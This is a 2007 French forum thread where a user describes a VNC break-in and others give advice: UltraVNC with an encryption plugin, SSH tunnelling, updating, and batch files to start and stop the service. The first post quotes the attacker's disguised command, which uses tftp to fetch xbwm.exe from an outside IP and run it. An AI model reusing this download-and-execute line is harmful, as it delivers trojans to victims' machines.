Hack (encore ...) vnc

Hack (encore ...) vnc - Sécurité - Windows & Software

Marsh Posté le 23-03-2007 à 16:18:24    

Salut,
 
J'ai été victime d'une intrusion via VNC, en me connectant ur mon bureau à distance tout à l'heure "coup de flippe" : plein de fenetres d'ouvertes, message de l'antivirus "alerte blabla" (avast).
 
Oui j'ai été con, j'utilisais les ports par défaut mais pourtant mon mdp faisait plus de 8 lettres, comportait des signes, des chifres etc ...
 
J'étais pas sur tout de suite : j'ai checké l'historique firefox + ie : rien de spé
Recherche fichiers crées ou modifiés aujourd'hui : rien de spé
 
par contre : démarrer, exécuter et là le drame, j'avais :
"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET xbwm.exe & start xbwm&"
 
Le fichier xbwm était bien le fichier reperé par l'antivirus (troyen bien sur).
 
Il s'est fait baisé pasque (petite sécurité de ma part) la session lancée était une session limitée et non admin et la session admin est protégée par un mdp.
 
J'ai matté l'observateur d'évenements windows :
niveau application : le drame, je vois plein de tentatives de connections dont 2 IP qui auraient reussies a se connecter via vnc (et plein d'ip failure ca fait flipper)
niveau sécurité : des tentatives de connections ur le compte admin
 
J'ai l'impression que le mec s'est lassé, ça devenai trop chiant.
 
Questions : Dois je tout formater ? changer d'adresse ? de femme ? d'amis ? etc ...   :D  
Que dois je faire pour etre sur d'etre protégé plus efficacement ? par exemple j'ai pensé à mettre un ecran de veille protegé par mdp sur le pc hote, est ce une bonne idée ?
 
Merci de votre aide  !!!   :)
 
ps : je précise que c'est la version 4.1.2 de VNC !


Message édité par bilou170 le 23-03-2007 à 17:04:39
Reply

Marsh Posté le 23-03-2007 à 16:18:24   

Reply

Marsh Posté le 23-03-2007 à 16:44:31    

Je viens d'essayer de me connecter sur 64.79.213.12 et j'ai ça comme résultat :
 
Warning: fopen(http://64.79.213.12): failed to open stream: Connection refused in /home/webconsu/www/proxy/proxy.php on line 29  
 
Warning: fclose(): supplied argument is not a valid stream resource in /home/webconsu/www/proxy/proxy.php on line 72  
 
Warning: fclose(): supplied argument is not a valid stream resource in /home/webconsu/www/proxy/proxy.php on line 73  
 
Warning: fopen(temp1174664502.htm): failed to open stream: No such file or directory in /home/webconsu/www/proxy/proxy.php on line 75
 
Mais là ça dépasse mes compétences ...

Reply

Marsh Posté le 23-03-2007 à 16:48:09    

Utilise Ultra-Vnc avec le plug-in MSRC4Plugin , cela te permet de generer un certificat que tu installes sur le poste serveur et client  :)

Reply

Marsh Posté le 20-04-2007 à 23:19:29    

J'ai ue la même chose que toi tu n'est pas seul rassure toi :D
J'ai scanné son "logiciel" qu'il fais DL, qui est détécté par aucun anti-virus bien évidament ...
MAis il m'a l'air d'un genre de serveur Ftp ou trojan je sais pas trop ...
Il c'est copié en plusieurs fois (dans system32 et dans document and setting) avec une extension différente et un autre nom.
Ne sachant pas ce que c'est j'ai préféré formater.
Fais attention à ce qu'il y aurai sur ton pc comme les mdp enregistrés dans un xml de filezilla, ou autre chose encore ...
Bonne soirée ;)

Reply

Marsh Posté le 21-04-2007 à 01:29:04    

il a surement voulu installer un serveur ftp sur ton pc
 
ca arrive chez mes clients avec vnc...
 
il dois y avoir une faille qui permet de prendre la main sans le mot de pass...

Reply

Marsh Posté le 21-04-2007 à 12:59:53    

Oui il y a un bypass qui existe pour vnc ...
Mais il me semble que les nouvelles versions ne sont plus concernées par cette faille ...

Reply

Marsh Posté le 21-04-2007 à 15:57:21    

Et en passant par un tunnel ssh ca résoud pas le problème des failles de vnc ?

Reply

Marsh Posté le 21-04-2007 à 20:13:33    

Déjà commence par mettre à jour ta version de vnc, la 4.1.2 date un peu...
Je suis d'accord avec doudart, utilises plutôt UltraVNC, c'est ce que j'utilise chez moi pour administrer mon 2em PC...
Ensuite tu n'es pas obligé de laisser le serveur VNC tout le temps en fonctionnement, mets son lancement sur manuel et ensuite créé deux batch sur ton bureau :
 
1:

Citation :


@echo off
echo Arret du service VNC
echo.
net stop "winvnc"
echo.
pause


 
2:

Citation :


@echo off
echo Demarrage du serveur VNC
echo.
net start "winvnc"
echo.
pause


 
Le premier sert à arrêter le serveur et le second à le lancer, donne leur un nom éxplicite et enregistre les, par exemple, sur ton bureau, il te suffira juste de lancer le 2em batch pour démarrer le serveur et de lancer le 1e pour arreter le serveur une fois que tu auras terminé !
@+

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed